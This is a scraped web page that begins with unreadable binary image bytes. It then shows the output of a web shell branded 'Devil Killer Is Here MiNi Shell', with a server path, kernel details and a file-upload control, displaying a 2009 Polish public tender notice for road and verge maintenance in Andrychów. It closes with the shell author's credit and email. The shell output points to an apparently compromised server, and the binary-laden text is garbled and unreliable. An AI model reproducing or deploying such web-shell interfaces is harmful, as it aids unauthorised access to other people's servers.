JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090223/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090223/41271-N-2009.html

<p class="kh_header"><b>Andrychów: Bieżąca konserwacja dróg, ulic, chodników gminnych, parkingów, przepustów i mostów oraz mechaniczne wykaszanie poboczy dróg i skarp rowów na terenie Gminy Andrychów.</b><br>
<b>Numer ogłoszenia: 41271 - 2009; data zamieszczenia: 23.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Andrychów reprezentowana przez Burmistrza , Rynek 15, 34-120 Andrychów, woj. małopolskie, tel. (0-33) 875-23-60, faks (0-33) 875-29-16.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.andrychow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżąca konserwacja dróg, ulic, chodników gminnych, parkingów, przepustów i mostów oraz mechaniczne wykaszanie poboczy dróg i skarp rowów na terenie Gminy Andrychów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres robót do wykonania w ramach wyżej wymienionego zadania obejmuje:
-bieżąca konserwacja nawierzchni ulepszonej - asfaltowej:
1).bieżąca konserwacja nawierzchni asfaltowej jezdni, grubość warstwy 5cm;
2).bieżąca konserwacja nawierzchni asfaltowej jezdni , likwidacja drobnych ubytków, wyłuszczeń, spękań siatkowych, podłużnych i poprzecznych,
-bieżąca konserwacja podbudowy i nawierzchni nieulepszonej;
3).uzupełnienie podbudowy i nawierzchni tłuczniem,
4).uzupełnienie ubytków nawierzchni materiałem kamiennym -
  (mat. Zamawiającego),
5).skropienie nawierzchni emulsją,
-bieżąca konserwacja chodników;
6).przełożenie nawierzchni chodnika z płytek betonowych lub z kostki betonowej, 
7).ułożenie nawierzchni chodnika z  płytek betonowych gr. 7cm, ułożenie nawierzchni chodnika z kostki brukowej betonowej gr. 6cm - kostka szara lub kolorowa, 
8).przełożenie obrzeża betonowego chodnikowego,
9).ułożenie obrzeża betonowego chodnikowego,
-bieżąca konserwacja krawężników; 
10).przełożenie - regulacja wysokościowa krawężnika bet. 15/30; 20/30 lub krawężnika kamiennego,
11).ułożenie krawężnika bet. 15/30; 20/30 na ławie betonowej,
- bieżąca konserwacja rowów, przepustów, skarp i ścieków
120.oczyszczenie rowu z namułu z odtworzeniem skarp i właściwym nadaniem profilu oraz ścieńcie poboczy,
13).oczyszczenie i utrzymanie drożności przepustu,
14).ułożenie - uzupełnienie korytek betonowych 45x50x25,
15).ułożenie - uzupełnienie korytek betonowych 50x50x50,
16).wymiana uszkodzonych lub zniszczonych przepustów o 200 - o 300,
17).wymiana uszkodzonych lub zniszczonych przepustów o 400 - o 600,
18).wymiana uszkodzonych lub zniszczonych przepustów o większych od 600,
19). ubezpieczenie skarp płytami ażurowymi 100x60,
20).ubezpieczenie skarp płytami ażurowymi 60x40,
-bieżąca konserwacja studni rewizyjnych i studzienek ściekowych;
21).wymiana uszkodzonych lub zniszczonych studni rewizyjnych lub studzienek ściekowych,
22).regulacja wysokościowa studni rewizyjnych lub studzienek ściekowych,
-bieżąca konserwacja poręczy drogowych i barier mostowych;
23).oczyszczenie i pomalowanie poręczy drogowych,
24).uzupełnienie lub wymiana uszkodzonych oraz zniszczonych elementów barier ochronnych drogowych, mostowych i barieroporęczy,
-bieżąca konserwacja mostów;
25).wykonanie przyczółków z betonu lub zabezpieczenie mostów i przyczółków betonem,
- bieżące utrzymanie poboczy dróg i skarp rowów;
26. koszenie traw, chwastów i samosiejek - teren płaski,
27. koszenie traw, chwastów i samosiejek - skarpy..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.31.50.00-9, 77.31.20.00-0, 77.31.41.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu o udzielenie zamówienia mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:

1. Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.

2. Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub posiadają pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.

3. Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.

4. Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.

Zamawiający dokona oceny spełnienia powyższych warunków udziału w postępowaniu przez Wykonawcę na podstawie oświadczeń i dokumentów przez niego dostarczonych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy Prawo zamówień publicznych Zamawiający żąda przedstawienia następujących dokumentów:

A. Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

B. Oświadczenia o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy Prawo zamówień publicznych (według wzoru - załącznik nr 3 do niniejszej specyfikacji).

C. Pisemne zobowiązanie  innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia - w przypadku, gdy wykonawca nie dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia. 

W celu potwierdzenia, opisanego przez Zamawiającego warunku posiadania przez 
Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia Zamawiający żąda następujących dokumentów:

D. Wykazu wykonanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców wraz z załączeniem dokumentów, że usługi zostały wykonane należycie (według wzoru załącznik nr - 4 do niniejszej specyfikacji).
Wykonawca  powinien wykazać że:
-w ciągu ostatnich trzech lat przed wszczęciem postępowania wykonał co najmniej jedno podobne zamówienie (pod względem charakteru i wartości).

E. Wykazu niezbędnych do wykonania zamówienia narzędzi i urządzeń, jakimi dysponuje wykonawca. (według wzoru -  załącznik nr 5 do niniejszej specyfikacji).
Wykonawca  powinien wykazać że:
- dysponuje następującym sprzętem i urządzeniami:
samochodem ciężarowym o ładowności powyżej 5 ton - min 2 szt.
koparką (koparko-ładowarką)  - min. 1 szt.
zagęszczarką płytową - min. 2 szt.
piłą do asfaltów - min. 2 szt.
walcem - min. 1 szt.
walcem ogumionym - min. 1 szt.
równiarką - min. 1 szt.
remonterem - min. 1 szt.
telefonem komórkowym - min. 2 szt.
ciągnikiem rolniczym z przyczepą, 1 szt. 
kosiarką bijakową na wysięgniku do 5 mb, 1 szt. 
kosą spalinową z frezem, 3 szt.
pilarką spalinową,  1 szt. 

F. Dokumentu stwierdzającego, że osoby, które będą wykonywać zamówienie posiadają wymagane uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej, zgodnie z art. 13 ust.1 pkt. 2 oraz art. 14 ust. 1 pkt 2a Ustawy z dnia 7 lipca 1994 r. - Prawo budowlane / Dz. U. z 2006 r. Nr 156 poz. 1118 z późn. zmian./ oraz aktualne zaświadczenie o wpisie na listę członków właściwej Izby Samorządu Zawodowego zgodnie z ustawą z dnia 15.12.2000r. o Samorządach Zawodowych Architektów, Inżynierów Budownictwa oraz Urbanistów /Dz. U. z 2001 r. Nr 5 poz. 42 z późniejszymi zmianami/ dla osób pełniących samodzielną funkcję techniczną w budownictwie.

W celu potwierdzenia, opisanego przez Zamawiającego warunku znajdowania się przez Wykonawcę w sytuacji  ekonomicznej i finansowej zapewniającej wykonanie zamówienia Zamawiający żąda następującego dokumentu:

G. Polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Wykonawca  powinien wykazać że:
-posiada polisę a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę minimum 50 000 zł.

Oprócz wyżej wymienionych dokumentów i oświadczeń oferta będzie zawierać:

H. Formularz ofertowy (według wzoru - załącznik nr  6  do niniejszej specyfikacji).

I. Wzór umowy (załącznik nr 7 do niniejszej specyfikacji) zatwierdzony przez osobę lub osoby uprawnione do reprezentowania Wykonawcy.

W przypadku wspólnego ubiegania się o udzielenie zamówienia wykonawcy ustanawiają pełnomocnika do reprezentowania w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
Dokumenty, o których mowa w pkt. C, D, E, F, H, I składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną.
Dokumenty, o których mowa w pkt. A, G składa każdy z podmiotów wspólnie ubiegających się o udzielenie zamówienia.
Co do dokumentu określonego w pkt. B:
oświadczenie w zakresie warunku 1) i 4) określonego w pkt. III.1 niniejszej specyfikacji składa każdy z podmiotów wspólnie odbiegających się o udzielenie zamówienia (według wzoru - załącznik 3a),
oświadczenie w zakresie warunku 2) i 3) określonego w pkt III.1 specyfikacji składa pełnomocnik wykonawców w imieniu wszystkich wykonawców składających ofertę wspólną (według wzoru - załącznik 3b).
Jeżeli oferta wykonawców wspólnie ubiegających sie o udzielenie zamówienia została wybrana, zamawiający zażąda przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.um.andrychow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Andrychowie, Rynek 16, pok. 121 (Wydział Drogownictwa
i Transportu) w godzinach: 7.30-15.30 poniedziałek, środa, czwartek,  piątek  oraz  8.00-16.00 wtorek..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.03.2009 godzina 09:30, miejsce: Urząd Miejski w Andrychowie, Rynek 15, sekretariat Burmistrza..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com